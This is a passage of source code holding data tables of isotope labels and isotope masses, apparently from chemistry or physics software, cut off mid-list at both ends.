"SB109", "SB110", "SB111", "SB112", "SB113", "SB114", "SB115", "SB116",
"SB117", "SB118", "SB119", "SB120", "SB121", "SB122", "SB123", "SB124",
"SB125", "SB126", "SB127", "SB128", "SB129", "SB130", "SB131", "SB132",
"SB133", "SB134", "SB135", "SB136", "SB137", "SB138", "SB139", "TE", "TE105",
"TE106", "TE107", "TE108", "TE109", "TE110", "TE111", "TE112", "TE113",
"TE114", "TE115", "TE116", "TE117", "TE118", "TE119", "TE120", "TE121",
"TE122", "TE123", "TE124", "TE125", "TE126", "TE127", "TE128", "TE129",
"TE130", "TE131", "TE132", "TE133", "TE134", "TE135", "TE136", "TE137",
"TE138", "TE139", "TE140", "TE141", "TE142", "I", "I108", "I109", "I110",
"I111", "I112", "I113", "I114", "I115", "I116", "I117", "I118", "I119", "I120",
"I121", "I122", "I123", "I124", "I125", "I126", "I127", "I128", "I129", "I130",
"I131", "I132", "I133", "I134", "I135", "I136", "I137", "I138", "I139", "I140",
"I141", "I142", "I143", "I144", "XE", "XE110", "XE111", "XE112", "XE113",
"XE114", "XE115", "XE116", "XE117", "XE118", "XE119", "XE120", "XE121",
"XE122", "XE123", "XE124", "XE125", "XE126", "XE127", "XE128", "XE129",
"XE130", "XE131", "XE132", "XE133", "XE134", "XE135", "XE136", "XE137",
"XE138", "XE139", "XE140", "XE141", "XE142", "XE143", "XE144", "XE145",
"XE146", "XE147", "CS", "CS112", "CS113", "CS114", "CS115", "CS116", "CS117",
"CS118", "CS119", "CS120", "CS121", "CS122", "CS123", "CS124", "CS125",
"CS126", "CS127", "CS128", "CS129", "CS130", "CS131", "CS132", "CS133",
"CS134", "CS135", "CS136", "CS137", "CS138", "CS139", "CS140", "CS141",
"CS142", "CS143", "CS144", "CS145", "CS146", "CS147", "CS148", "CS149",
"CS150", "CS151", "BA", "BA114", "BA115", "BA116", "BA117", "BA118", "BA119",
"BA120", "BA121", "BA122", "BA123", "BA124", "BA125", "BA126", "BA127",
"BA128", "BA129", "BA130", "BA131", "BA132", "BA133", "BA134", "BA135",
"BA136", "BA137", "BA138", "BA139", "BA140", "BA141", "BA142", "BA143",
"BA144", "BA145", "BA146", "BA147", "BA148", "BA149", "BA150", "BA151",
"BA152", "BA153", "LA", "LA117", "LA118", "LA119", "LA120", "LA121", "LA122",
"LA123", "LA124", "LA125", "LA126", "LA127", "LA128", "LA129", "LA130",
"LA131", "LA132", "LA133", "LA134", "LA135", "LA136", "LA137", "LA138",
"LA139", "LA140", "LA141", "LA142", "LA143", "LA144", "LA145", "LA146",
"LA147", "LA148", "LA149", "LA150", "LA151", "LA152", "LA153", "LA154",
"LA155", "CE", "CE119", "CE120", "CE121", "CE122", "CE123", "CE124", "CE125",
"CE126", "CE127", "CE128", "CE129", "CE130", "CE131", "CE132", "CE133",
"CE134", "CE135", "CE136", "CE137", "CE138", "CE139", "CE140", "CE141",
"CE142", "CE143", "CE144", "CE145", "CE146", "CE147", "CE148", "CE149",
"CE150", "CE151", "CE152", "CE153", "CE154", "CE155", "CE156", "CE157", "PR",
"PR121", "PR122", "PR123", "PR124", "PR125", "PR126", "PR127", "PR128",
"PR129", "PR130", "PR131", "PR132", "PR133", "PR134", "PR135", "PR136",
"PR137", "PR138", "PR139", "PR140", "PR141", "PR142", "PR143", "PR144",
"PR145", "PR146", "PR147", "PR148", "PR149", "PR150", "PR151", "PR152",
"PR153", "PR154", "PR155", "PR156", "PR157", "PR158", "PR159", "ND", "ND124",
"ND125", "ND126", "ND127", "ND128", "ND129", "ND130", "ND131", "ND132",
"ND133", "ND134", "ND135", "ND136", "ND137", "ND138", "ND139", "ND140",
"ND141", "ND142", "ND143", "ND144", "ND145", "ND146", "ND147", "ND148",
"ND149", "ND150", "ND151", "ND152", "ND153", "ND154", "ND155", "ND156",
"ND157", "ND158", "ND159", "ND160", "ND161", "PM", "PM126", "PM127", "PM128",
"PM129", "PM130", "PM131", "PM132", "PM133", "PM134", "PM135", "PM136",
"PM137", "PM138", "PM139", "PM140", "PM141", "PM142", "PM143", "PM144",
"PM145", "PM146", "PM147", "PM148", "PM149", "PM150", "PM151", "PM152",
"PM153", "PM154", "PM155", "PM156", "PM157", "PM158", "PM159", "PM160",
"PM161", "PM162", "PM163", "SM", "SM128", "SM129", "SM130", "SM131", "SM132",
"SM133", "SM134", "SM135", "SM136", "SM137", "SM138", "SM139", "SM140",
"SM141", "SM142", "SM143", "SM144", "SM145", "SM146", "SM147", "SM148",
"SM149", "SM150", "SM151", "SM152", "SM153", "SM154", "SM155", "SM156",
"SM157", "SM158", "SM159", "SM160", "SM161", "SM162", "SM163", "SM164",
"SM165", "EU", "EU130", "EU131", "EU132", "EU133", "EU134", "EU135", "EU136",
"EU137", "EU138", "EU139", "EU140", "EU141", "EU142", "EU143", "EU144",
"EU145", "EU146", "EU147", "EU148", "EU149", "EU150", "EU151", "EU152",
"EU153", "EU154", "EU155", "EU156", "EU157", "EU158", "EU159", "EU160",
"EU161", "EU162", "EU163", "EU164", "EU165", "EU166", "EU167", "GD", "GD134",
"GD135", "GD136", "GD137", "GD138", "GD139", "GD140", "GD141", "GD142",
"GD143", "GD144", "GD145", "GD146", "GD147", "GD148", "GD149", "GD150",
"GD151", "GD152", "GD153", "GD154", "GD155", "GD156", "GD157", "GD158",
"GD159", "GD160", "GD161", "GD162", "GD163", "GD164", "GD165", "GD166",
"GD167", "GD168", "GD169", "TB", "TB136", "TB137", "TB138", "TB139", "TB140",
"TB141", "TB142", "TB143", "TB144", "TB145", "TB146", "TB147", "TB148",
"TB149", "TB150", "TB151", "TB152", "TB153", "TB154", "TB155", "TB156",
"TB157", "TB158", "TB159", "TB160", "TB161", "TB162", "TB163", "TB164",
"TB165", "TB166", "TB167", "TB168", "TB169", "TB170", "TB171", "DY", "DY138",
"DY139", "DY140", "DY141", "DY142", "DY143", "DY144", "DY145", "DY146",
"DY147", "DY148", "DY149", "DY150", "DY151", "DY152", "DY153", "DY154",
"DY155", "DY156", "DY157", "DY158", "DY159", "DY160", "DY161", "DY162",
"DY163", "DY164", "DY165", "DY166", "DY167", "DY168", "DY169", "DY170",
"DY171", "DY172", "DY173", "HO", "HO140", "HO141", "HO142", "HO143", "HO144",
"HO145", "HO146", "HO147", "HO148", "HO149", "HO150", "HO151", "HO152",
"HO153", "HO154", "HO155", "HO156", "HO157", "HO158", "HO159", "HO160",
"HO161", "HO162", "HO163", "HO164", "HO165", "HO166", "HO167", "HO168",
"HO169", "HO170", "HO171", "HO172", "HO173", "HO174", "HO175", "ER", "ER143",
"ER144", "ER145", "ER146", "ER147", "ER148", "ER149", "ER150", "ER151",
"ER152", "ER153", "ER154", "ER155", "ER156", "ER157", "ER158", "ER159",
"ER160", "ER161", "ER162", "ER163", "ER164", "ER165", "ER166", "ER167",
"ER168", "ER169", "ER170", "ER171", "ER172", "ER173", "ER174", "ER175",
"ER176", "ER177", "TM", "TM145", "TM146", "TM147", "TM148", "TM149", "TM150",
"TM151", "TM152", "TM153", "TM154", "TM155", "TM156", "TM157", "TM158",
"TM159", "TM160", "TM161", "TM162", "TM163", "TM164", "TM165", "TM166",
"TM167", "TM168", "TM169", "TM170", "TM171", "TM172", "TM173", "TM174",
"TM175", "TM176", "TM177", "TM178", "TM179", "YB", "YB148", "YB149", "YB150",
"YB151", "YB152", "YB153", "YB154", "YB155", "YB156", "YB157", "YB158",
"YB159", "YB160", "YB161", "YB162", "YB163", "YB164", "YB165", "YB166",
"YB167", "YB168", "YB169", "YB170", "YB171", "YB172", "YB173", "YB174",
"YB175", "YB176", "YB177", "YB178", "YB179", "YB180", "YB181", "LU", "LU150",
"LU151", "LU152", "LU153", "LU154", "LU155", "LU156", "LU157", "LU158",
"LU159", "LU160", "LU161", "LU162", "LU163", "LU164", "LU165", "LU166",
"LU167", "LU168", "LU169", "LU170", "LU171", "LU172", "LU173", "LU174",
"LU175", "LU176", "LU177", "LU178", "LU179", "LU180", "LU181", "LU182",
"LU183", "LU184", "HF", "HF153", "HF154", "HF155", "HF156", "HF157", "HF158",
"HF159", "HF160", "HF161", "HF162", "HF163", "HF164", "HF165", "HF166",
"HF167", "HF168", "HF169", "HF170", "HF171", "HF172", "HF173", "HF174",
"HF175", "HF176", "HF177", "HF178", "HF179", "HF180", "HF181", "HF182",
"HF183", "HF184", "HF185", "HF186", "HF187", "HF188", "TA", "TA155", "TA156",
"TA157", "TA158", "TA159", "TA160", "TA161", "TA162", "TA163", "TA164",
"TA165", "TA166", "TA167", "TA168", "TA169", "TA170", "TA171", "TA172",
"TA173", "TA174", "TA175", "TA176", "TA177", "TA178", "TA179", "TA180",
"TA181", "TA182", "TA183", "TA184", "TA185", "TA186", "TA187", "TA188",
"TA189", "TA190", "W", "W158", "W159", "W160", "W161", "W162", "W163", "W164",
"W165", "W166", "W167", "W168", "W169", "W170", "W171", "W172", "W173", "W174",
"W175", "W176", "W177", "W178", "W179", "W180", "W181", "W182", "W183", "W184",
"W185", "W186", "W187", "W188", "W189", "W190", "W191", "W192", "RE", "RE160",
"RE161", "RE162", "RE163", "RE164", "RE165", "RE166", "RE167", "RE168",
"RE169", "RE170", "RE171", "RE172", "RE173", "RE174", "RE175", "RE176",
"RE177", "RE178", "RE179", "RE180", "RE181", "RE182", "RE183", "RE184",
"RE185", "RE186", "RE187", "RE188", "RE189", "RE190", "RE191", "RE192",
"RE193", "RE194", "OS", "OS162", "OS163", "OS164", "OS165", "OS166", "OS167",
"OS168", "OS169", "OS170", "OS171", "OS172", "OS173", "OS174", "OS175",
"OS176", "OS177", "OS178", "OS179", "OS180", "OS181", "OS182", "OS183",
"OS184", "OS185", "OS186", "OS187", "OS188", "OS189", "OS190", "OS191",
"OS192", "OS193", "OS194", "OS195", "OS196", "IR", "IR164", "IR165", "IR166",
"IR167", "IR168", "IR169", "IR170", "IR171", "IR172", "IR173", "IR174",
"IR175", "IR176", "IR177", "IR178", "IR179", "IR180", "IR181", "IR182",
"IR183", "IR184", "IR185", "IR186", "IR187", "IR188", "IR189", "IR190",
"IR191", "IR192", "IR193", "IR194", "IR195", "IR196", "IR197", "IR198",
"IR199", "PT", "PT166", "PT167", "PT168", "PT169", "PT170", "PT171", "PT172",
"PT173", "PT174", "PT175", "PT176", "PT177", "PT178", "PT179", "PT180",
"PT181", "PT182", "PT183", "PT184", "PT185", "PT186", "PT187", "PT188",
"PT189", "PT190", "PT191", "PT192", "PT193", "PT194", "PT195", "PT196",
"PT197", "PT198", "PT199", "PT200", "PT201", "PT202", "AU", "AU169", "AU170",
"AU171", "AU172", "AU173", "AU174", "AU175", "AU176", "AU177", "AU178",
"AU179", "AU180", "AU181", "AU182", "AU183", "AU184", "AU185", "AU186",
"AU187", "AU188", "AU189", "AU190", "AU191", "AU192", "AU193", "AU194",
"AU195", "AU196", "AU197", "AU198", "AU199", "AU200", "AU201", "AU202",
"AU203", "AU204", "AU205", "HG", "HG171", "HG172", "HG173", "HG174", "HG175",
"HG176", "HG177", "HG178", "HG179", "HG180", "HG181", "HG182", "HG183",
"HG184", "HG185", "HG186", "HG187", "HG188", "HG189", "HG190", "HG191",
"HG192", "HG193", "HG194", "HG195", "HG196", "HG197", "HG198", "HG199",
"HG200", "HG201", "HG202", "HG203", "HG204", "HG205", "HG206", "HG207",
"HG208", "HG209", "HG210", "TL", "TL176", "TL177", "TL178", "TL179", "TL180",
"TL181", "TL182", "TL183", "TL184", "TL185", "TL186", "TL187", "TL188",
"TL189", "TL190", "TL191", "TL192", "TL193", "TL194", "TL195", "TL196",
"TL197", "TL198", "TL199", "TL200", "TL201", "TL202", "TL203", "TL204",
"TL205", "TL206", "TL207", "TL208", "TL209", "TL210", "TL211", "TL212", "PB",
"PB178", "PB179", "PB180", "PB181", "PB182", "PB183", "PB184", "PB185",
"PB186", "PB187", "PB188", "PB189", "PB190", "PB191", "PB192", "PB193",
"PB194", "PB195", "PB196", "PB197", "PB198", "PB199", "PB200", "PB201",
"PB202", "PB203", "PB204", "PB205", "PB206", "PB207", "PB208", "PB209",
"PB210", "PB211", "PB212", "PB213", "PB214", "PB215", "BI", "BI184", "BI185",
"BI186", "BI187", "BI188", "BI189", "BI190", "BI191", "BI192", "BI193",
"BI194", "BI195", "BI196", "BI197", "BI198", "BI199", "BI200", "BI201",
"BI202", "BI203", "BI204", "BI205", "BI206", "BI207", "BI208", "BI209",
"BI210", "BI211", "BI212", "BI213", "BI214", "BI215", "BI216", "BI217",
"BI218", "PO", "PO188", "PO189", "PO190", "PO191", "PO192", "PO193", "PO194",
"PO195", "PO196", "PO197", "PO198", "PO199", "PO200", "PO201", "PO202",
"PO203", "PO204", "PO205", "PO206", "PO207", "PO208", "PO209", "PO210",
"PO211", "PO212", "PO213", "PO214", "PO215", "PO216", "PO217", "PO218",
"PO219", "PO220", "AT", "AT193", "AT194", "AT195", "AT196", "AT197", "AT198",
"AT199", "AT200", "AT201", "AT202", "AT203", "AT204", "AT205", "AT206",
"AT207", "AT208", "AT209", "AT210", "AT211", "AT212", "AT213", "AT214",
"AT215", "AT216", "AT217", "AT218", "AT219", "AT220", "AT221", "AT222",
"AT223", "RN", "RN195", "RN196", "RN197", "RN198", "RN199", "RN200", "RN201",
"RN202", "RN203", "RN204", "RN205", "RN206", "RN207", "RN208", "RN209",
"RN210", "RN211", "RN212", "RN213", "RN214", "RN215", "RN216", "RN217",
"RN218", "RN219", "RN220", "RN221", "RN222", "RN223", "RN224", "RN225",
"RN226", "RN227", "RN228", "FR", "FR199", "FR200", "FR201", "FR202", "FR203",
"FR204", "FR205", "FR206", "FR207", "FR208", "FR209", "FR210", "FR211",
"FR212", "FR213", "FR214", "FR215", "FR216", "FR217", "FR218", "FR219",
"FR220", "FR221", "FR222", "FR223", "FR224", "FR225", "FR226", "FR227",
"FR228", "FR229", "FR230", "FR231", "FR232", "RA", "RA202", "RA203", "RA204",
"RA205", "RA206", "RA207", "RA208", "RA209", "RA210", "RA211", "RA212",
"RA213", "RA214", "RA215", "RA216", "RA217", "RA218", "RA219", "RA220",
"RA221", "RA222", "RA223", "RA224", "RA225", "RA226", "RA227", "RA228",
"RA229", "RA230", "RA231", "RA232", "RA233", "RA234", "AC", "AC206", "AC207",
"AC208", "AC209", "AC210", "AC211", "AC212", "AC213", "AC214", "AC215",
"AC216", "AC217", "AC218", "AC219", "AC220", "AC221", "AC222", "AC223",
"AC224", "AC225", "AC226", "AC227", "AC228", "AC229", "AC230", "AC231",
"AC232", "AC233", "AC234", "AC235", "AC236", "TH", "TH209", "TH210", "TH211",
"TH212", "TH213", "TH214", "TH215", "TH216", "TH217", "TH218", "TH219",
"TH220", "TH221", "TH222", "TH223", "TH224", "TH225", "TH226", "TH227",
"TH228", "TH229", "TH230", "TH231", "TH232", "TH233", "TH234", "TH235",
"TH236", "TH237", "TH238", "PA", "PA212", "PA213", "PA214", "PA215", "PA216",
"PA217", "PA218", "PA219", "PA220", "PA221", "PA222", "PA223", "PA224",
"PA225", "PA226", "PA227", "PA228", "PA229", "PA230", "PA231", "PA232",
"PA233", "PA234", "PA235", "PA236", "PA237", "PA238", "PA239", "PA240", "U",
"U217", "U218", "U219", "U220", "U221", "U222", "U223", "U224", "U225", "U226",
"U227", "U228", "U229", "U230", "U231", "U232", "U233", "U234", "U235", "U236",
"U237", "U238", "U239", "U240", "U241", "U242", "NP", "NP225", "NP226",
"NP227", "NP228", "NP229", "NP230", "NP231", "NP232", "NP233", "NP234",
"NP235", "NP236", "NP237", "NP238", "NP239", "NP240", "NP241", "NP242",
"NP243", "NP244", "PU", "PU228", "PU229", "PU230", "PU231", "PU232", "PU233",
"PU234", "PU235", "PU236", "PU237", "PU238", "PU239", "PU240", "PU241",
"PU242", "PU243", "PU244", "PU245", "PU246", "PU247", "AM", "AM231", "AM232",
"AM233", "AM234", "AM235", "AM236", "AM237", "AM238", "AM239", "AM240",
"AM241", "AM242", "AM243", "AM244", "AM245", "AM246", "AM247", "AM248",
"AM249", "CM", "CM233", "CM234", "CM235", "CM236", "CM237", "CM238", "CM239",
"CM240", "CM241", "CM242", "CM243", "CM244", "CM245", "CM246", "CM247",
"CM248", "CM249", "CM250", "CM251", "CM252", "BK", "BK235", "BK236", "BK237",
"BK238", "BK239", "BK240", "BK241", "BK242", "BK243", "BK244", "BK245",
"BK246", "BK247", "BK248", "BK249", "BK250", "BK251", "BK252", "BK253",
"BK254", "CF", "CF237", "CF238", "CF239", "CF240", "CF241", "CF242", "CF243",
"CF244", "CF245", "CF246", "CF247", "CF248", "CF249", "CF250", "CF251",
"CF252", "CF253", "CF254", "CF255", "CF256", "ES", "ES240", "ES241", "ES242",
"ES243", "ES244", "ES245", "ES246", "ES247", "ES248", "ES249", "ES250",
"ES251", "ES252", "ES253", "ES254", "ES255", "ES256", "ES257", "ES258", "FM",
"FM242", "FM243", "FM244", "FM245", "FM246", "FM247", "FM248", "FM249",
"FM250", "FM251", "FM252", "FM253", "FM254", "FM255", "FM256", "FM257",
"FM258", "FM259", "FM260", "MD", "MD245", "MD246", "MD247", "MD248", "MD249",
"MD250", "MD251", "MD252", "MD253", "MD254", "MD255", "MD256", "MD257",
"MD258", "MD259", "MD260", "MD261", "MD262", "NO", "NO248", "NO249", "NO250",
"NO251", "NO252", "NO253", "NO254", "NO255", "NO256", "NO257", "NO258",
"NO259", "NO260", "NO261", "NO262", "NO263", "NO264", "LR", "LR251", "LR252",
"LR253", "LR254", "LR255", "LR256", "LR257", "LR258", "LR259", "LR260",
"LR261", "LR262", "LR263", "LR264", "LR265", "LR266", "RF", "RF253", "RF254",
"RF255", "RF256", "RF257", "RF258", "RF259", "RF260", "RF261", "RF262",
"RF263", "RF264", "RF265", "RF266", "RF267", "RF268", "DB", "DB255", "DB256",
"DB257", "DB258", "DB259", "DB260", "DB261", "DB262", "DB263", "DB264",
"DB265", "DB266", "DB267", "DB268", "DB269", "DB270", "SG", "SG258", "SG259",
"SG260", "SG261", "SG262", "SG263", "SG264", "SG265", "SG266", "SG267",
"SG268", "SG269", "SG270", "SG271", "SG272", "SG273", "BH", "BH260", "BH261",
"BH262", "BH263", "BH264", "BH265", "BH266", "BH267", "BH268", "BH269",
"BH270", "BH271", "BH272", "BH273", "BH274", "BH275", "HS", "HS263", "HS264",
"HS265", "HS266", "HS267", "HS268", "HS269", "HS270", "HS271", "HS272",
"HS273", "HS274", "HS275", "HS276", "HS277", "MT", "MT265", "MT266", "MT267",
"MT268", "MT269", "MT270", "MT271", "MT272", "MT273", "MT274", "MT275",
"MT276", "MT277", "MT278", "MT279", "DS", "DS267", "DS268", "DS269", "DS270",
"DS271", "DS272", "DS273", "DS274", "DS275", "DS276", "DS277", "DS278",
"DS279", "DS280", "DS281", "RG", "RG272", "RG273", "RG274", "RG275", "RG276",
"RG277", "RG278", "RG279", "RG280", "RG281", "RG282", "RG283", "UUB",
"UUB277", "UUB278", "UUB279", "UUB280", "UUB281", "UUB282", "UUB283",
"UUB284", "UUB285", "UUT", "UUT283", "UUT284", "UUT285", "UUT286", "UUT287",
"UUQ", "UUQ285", "UUQ286", "UUQ287", "UUQ288", "UUQ289", "UUP", "UUP287",
"UUP288", "UUP289", "UUP290", "UUP291", "UUH", "UUH289", "UUH290", "UUH291",
"UUH292", "UUS", "UUS291", "UUS292", "UUO", "UUO293"]
_temp_iso_mass = [
1.00782503207, 1.00782503207, 2.01410177785, 2.01410177785, 3.01604927767,
3.01604927767, 4.027806424, 5.035311488, 6.044942594, 7.052749,
4.00260325415, 3.01602931914, 4.00260325415, 5.012223624, 6.018889124,
7.028020618, 8.033921897, 9.043950286, 10.052398837, 7.016004548, 3.030775,
4.027185558, 5.0125378, 6.015122794, 7.016004548, 8.022487362, 9.026789505,
10.035481259, 11.043797715, 12.053780, 9.012182201, 5.040790, 6.019726317,
7.016929828, 8.005305103, 9.012182201, 10.013533818, 11.021657749,
12.026920737, 13.035693007, 14.04289292, 15.053460, 16.061920, 11.009305406,
6.046810, 7.029917901, 8.024607233, 9.013328782, 10.012936992, 11.009305406,
12.014352104, 13.017780217, 14.025404009, 15.031103021, 16.039808829,
17.046989906, 18.056170, 19.063730, 12, 8.037675025, 9.031036689,
10.016853228, 11.011433613, 12, 13.00335483778, 14.0032419887, 15.010599256,
16.014701252, 17.022586116, 18.026759354, 19.034805018, 20.040319754,
21.049340, 22.057200, 14.00307400478, 10.041653674, 11.026090956,
12.018613197, 13.005738609, 14.00307400478, 15.00010889823, 16.006101658,
17.008450261, 18.014078959, 19.017028697, 20.023365807, 21.02710824,
22.034394934, 23.041220, 24.051040, 25.060660, 15.99491461956,
12.034404895, 13.024812213, 14.00859625, 15.003065617, 15.99491461956,
16.999131703, 17.999161001, 19.00358013, 20.004076742, 21.008655886,
22.009966947, 23.015687659, 24.020472917, 25.029460, 26.038340, 27.048260,
28.057810, 18.998403224, 14.035060, 15.018009103, 16.011465724,
17.002095237, 18.000937956, 18.998403224, 19.999981315, 20.999948951,
22.002998815, 23.003574631, 24.008115485, 25.012101747, 26.019615555,
27.026760086, 28.035670, 29.043260, 30.052500, 31.060429, 19.99244017542,
16.025761262, 17.017671504, 18.005708213, 19.001880248, 19.99244017542,
20.993846684, 21.991385113, 22.994466904, 23.993610779, 24.997736888,
26.000461206, 27.007589903, 28.012071575, 29.019385933, 30.024801045,
31.033110, 32.040020, 33.049380, 34.057028, 22.98976928087, 18.025969,
19.013877499, 20.007351328, 20.997655206, 21.994436425, 22.98976928087,
23.990962782, 24.989953968, 25.992633, 26.994076788, 27.998938, 29.002861,
30.008976, 31.013585452, 32.02046656, 33.026719756, 34.035170, 35.042493,
36.051480, 37.059340, 23.985041699, 19.03547, 20.018862545, 21.01171291,
21.999573843, 22.994123669, 23.985041699, 24.985836917, 25.982592929,
26.984340585, 27.983876825, 28.9886, 29.990434, 30.996546, 31.998975,
33.005254, 34.009456424, 35.017340, 36.023000, 37.031400, 38.037570,
39.046772, 40.053930, 26.981538627, 21.028040, 22.019520, 23.007267432,
23.999938865, 24.990428095, 25.986891692, 26.981538627, 27.981910306,
28.980445046, 29.982960256, 30.983946619, 31.988124489, 32.990843336,
33.996851837, 34.999860235, 36.006207204, 37.01067782, 38.017231021,
39.02297, 40.031450, 41.038330, 42.046890, 27.97692653246, 22.034530,
23.025520, 24.011545616, 25.004105574, 25.992329921, 26.986704905,
27.97692653246, 28.9764947, 29.973770171, 30.975363226999998,
31.974148082, 32.97800022, 33.978575524, 34.984583575, 35.986599477,
36.99293608, 37.995633601, 39.002070013, 40.005869121, 41.01456,
42.019790, 43.028660, 44.035260, 30.973761629, 24.034350, 25.020260,
26.011780, 26.999230236, 27.992314761, 28.981800606, 29.978313789,
30.973761629, 31.973907274, 32.971725543, 33.973636257, 34.973314117,
35.97825968, 36.979608946, 37.984156827, 38.986179475, 39.991296951,
40.994335435, 42.001007913, 43.00619, 44.012990, 45.019220, 46.027380,
31.972070999, 26.027880, 27.018833, 28.004372763, 28.996608049,
29.984903249, 30.979554728, 31.972070999, 32.971458759, 33.967866902,
34.969032161, 35.96708076, 36.971125567, 37.971163317, 38.975134306,
39.975451728, 40.979582149, 41.981022419, 42.98715479, 43.99021339,
44.996508112, 46.000750, 47.008590, 48.014170, 49.023619, 34.968852682,
28.028510, 29.014110, 30.004770, 30.992413086, 31.985689901, 32.977451887,
33.973762819, 34.968852682, 35.968306981, 36.965902591, 37.968010425,
38.968008164, 39.970415472, 40.970684525, 41.973254804, 42.974054403,
43.978281071, 44.980286886, 45.98421004, 46.988710, 47.994950, 49.000320,
50.007840, 51.014490, 39.96238312251, 30.021560, 31.012123, 31.997637984,
32.989925709, 33.980271244, 34.975257585, 35.967545105, 36.96677632,
37.962732394, 38.964313231, 39.96238312251, 40.964500611, 41.963045736,
42.965636056, 43.964924033, 44.968039956, 45.968094129, 46.972186792,
47.974540, 48.980520, 49.984430, 50.991630, 51.996780, 53.004940,
38.963706679, 32.021920, 33.007260, 33.998410, 34.988009692, 35.981292235,
36.973375889, 37.969081184, 38.963706679, 39.963998475, 40.961825762,
41.96240281, 42.96071554, 43.961556804, 44.960699493, 45.961976864,
46.961678473, 47.965513535, 48.967450928, 49.972783355, 50.976380,
51.982610, 52.987120, 53.994200, 54.999710, 39.962590983, 34.014120,
35.004940, 35.993087063, 36.985870269, 37.976318452, 38.970719725,
39.962590983, 40.962278062, 41.958618014, 42.958766628, 43.955481754,
44.956186566, 45.953692587, 46.954546006, 47.952534177, 48.955674148,
49.957518962, 50.961499214, 51.9651, 52.970050, 53.974350, 54.980550,
55.985570, 56.992356, 44.955911909, 36.014920, 37.003050, 37.994700,
38.984790002, 39.977967407, 40.969251125, 41.965516429, 42.961150658,
43.959402752, 44.955911909, 45.95517189, 46.952407508, 47.952231468,
48.950023975, 49.952187685, 50.953603368, 51.956675468, 52.959610,
53.963264561, 54.968243949, 55.972870, 56.977790, 57.983710, 58.989220,
59.995710, 47.947946281, 38.009770, 39.001610, 39.990498838, 40.983145,
41.973030902, 42.968522499, 43.959690069, 44.958125616, 45.952631555,
46.951763088, 47.947946281, 48.947869982, 49.944791194, 50.946614955,
51.946897311, 52.949727171, 53.951052401, 54.955265056, 55.958199639,
56.963989137, 57.966970, 58.972930, 59.976760, 60.983200, 61.987490,
62.994420, 50.943959507, 40.011090, 40.999780, 41.991230, 42.980650,
43.97411, 44.965775808, 45.960200481, 46.95490894, 47.952253707,
48.948516101, 49.947158485, 50.943959507, 51.944775479, 52.944337979,
53.946439854, 54.947233701, 55.950530966, 56.952561432, 57.956834136,
58.960207407, 59.965026862, 60.968480, 61.973780, 62.977550, 63.983470,
64.987920, 51.940507472, 42.006430, 42.997710, 43.985549, 44.97964,
45.968358635, 46.962900046, 47.954031716, 48.951335721, 49.946044205,
50.944767431, 51.940507472, 52.940649386, 53.938880395, 54.940839672,
55.940653139, 56.943613013, 57.944353129, 58.948586367, 59.950076033,
60.954717204, 61.95661319, 62.961860, 63.964410, 64.970160, 65.973380,
66.979550, 54.938045141, 44.006870, 44.994510, 45.986720, 46.976100,
47.96852, 48.959618005, 49.95423823, 50.948210787, 51.945565464,
52.941290117, 53.940358854, 54.938045141, 55.93890491, 56.938285378,
57.939981549, 58.940440237, 59.942911246, 60.944652638, 61.94842822,
62.95023999, 63.95424909, 64.956336065, 65.961080, 66.964140, 67.969300,
68.972840, 55.934937475, 45.014578, 46.000810, 46.992890, 47.980504,
48.973610, 49.962988982, 50.956819538, 51.948113875, 52.945307942,
53.939610501, 54.938293357, 55.934937475, 56.935393969, 57.933275558,
58.934875464, 59.934071683, 60.936745281, 61.936767442, 62.940369091,
63.941201265, 64.94538027, 65.946780638, 66.950947244, 67.9537, 68.958780,
69.961460, 70.966720, 71.969620, 58.933195048, 47.011490, 48.001760,
48.989720, 49.981540, 50.970720, 51.963590, 52.954218896, 53.948459635,
54.941999029, 55.939839278, 56.936291373, 57.935752814, 58.933195048,
59.933817059, 60.932475763, 61.934050563, 62.933611611, 63.935809908,
64.93647846, 65.939762004, 66.940889529, 67.944873058, 68.94632, 69.951,
70.9529, 71.957810, 72.960240, 73.965380, 74.968330, 57.935342907,
48.019750, 49.009660, 49.995930, 50.987720, 51.975680, 52.968470,
53.957905495, 54.951330251, 55.942132022, 56.939793526, 57.935342907,
58.934346705, 59.930786372, 60.931056033, 61.928345115, 62.929669374,
63.927965959, 64.930084304, 65.929139334, 66.931569414, 67.931868789,
68.935610269, 69.9365, 70.940736283, 71.942092682, 72.946470, 73.948070,
74.952870, 75.955330, 76.960550, 77.963180, 62.929597474, 51.997180,
52.985550, 53.976710, 54.966050, 55.958560, 56.949211078, 57.944538499,
58.939498028, 59.93736503, 60.933457821, 61.932583745, 62.929597474,
63.929764183, 64.927789485, 65.928868813, 66.927730314, 67.929610889,
68.929429269, 69.932392343, 70.932676833, 71.935820307, 72.936675282,
73.939874862, 74.9419, 75.945275026, 76.947850, 77.951960, 78.954560,
79.960870, 63.929142222, 53.992950, 54.983980, 55.972380, 56.964788,
57.954591555, 58.949263764, 59.941827035, 60.939510635, 61.934329764,
62.933211566, 63.929142222, 64.929240984, 65.926033419, 66.927127345,
67.924844154, 68.926550281, 69.925319274, 70.927721599, 71.926857951,
72.929779104, 73.929458609, 74.932936741, 75.93329357, 76.936958967,
77.938440216, 78.942652, 79.944342348, 80.950480, 81.954420, 82.961030,
68.925573587, 55.994910, 56.982930, 57.974250, 58.963370, 59.957060,
60.949446287, 61.944175238, 62.939294196, 63.936838747, 64.932734754,
65.93158901, 66.928201703, 67.927980084, 68.925573587, 69.926021972,
70.924701349, 71.926366268, 72.925174682, 73.926945762, 74.926500246,
75.928827626, 76.9291543, 77.93160818, 78.93289326, 79.936515781,
80.937752355, 81.942990, 82.946980, 83.952650, 84.957000, 85.963120,
73.921177767, 57.991010, 58.981750, 59.970190, 60.963790, 61.954650,
62.949640, 63.941653, 64.939436406, 65.933843453, 66.93273407,
67.92809424, 68.927964533, 69.924247381, 70.924950954, 71.922075815,
72.923458945, 73.921177767, 74.922858948, 75.921402557, 76.923548591,
77.922852739, 78.925400995, 79.925372392, 80.928820467, 81.929549725,
82.934620, 83.937470, 84.943030, 85.946490, 86.952510, 87.956910,
88.963830, 74.921596478, 59.993130, 60.980620, 61.973200, 62.963690,
63.957572, 64.949564, 65.94471, 66.939186071, 67.936769069, 68.932273675,
69.930924826, 70.927112428, 71.926752283, 72.923824844, 73.923928692,
74.921596478, 75.922394021, 76.920647286, 77.921827281, 78.920947934,
79.922533816, 80.922132287, 81.924504067, 82.924980024, 83.929058,
84.932020, 85.936500, 86.939900, 87.944940, 88.949390, 89.955500,
90.960430, 91.966800, 79.916521271, 64.964660, 65.955210, 66.950090,
67.941798, 68.939557817, 69.933390644, 70.932241822, 71.927112352,
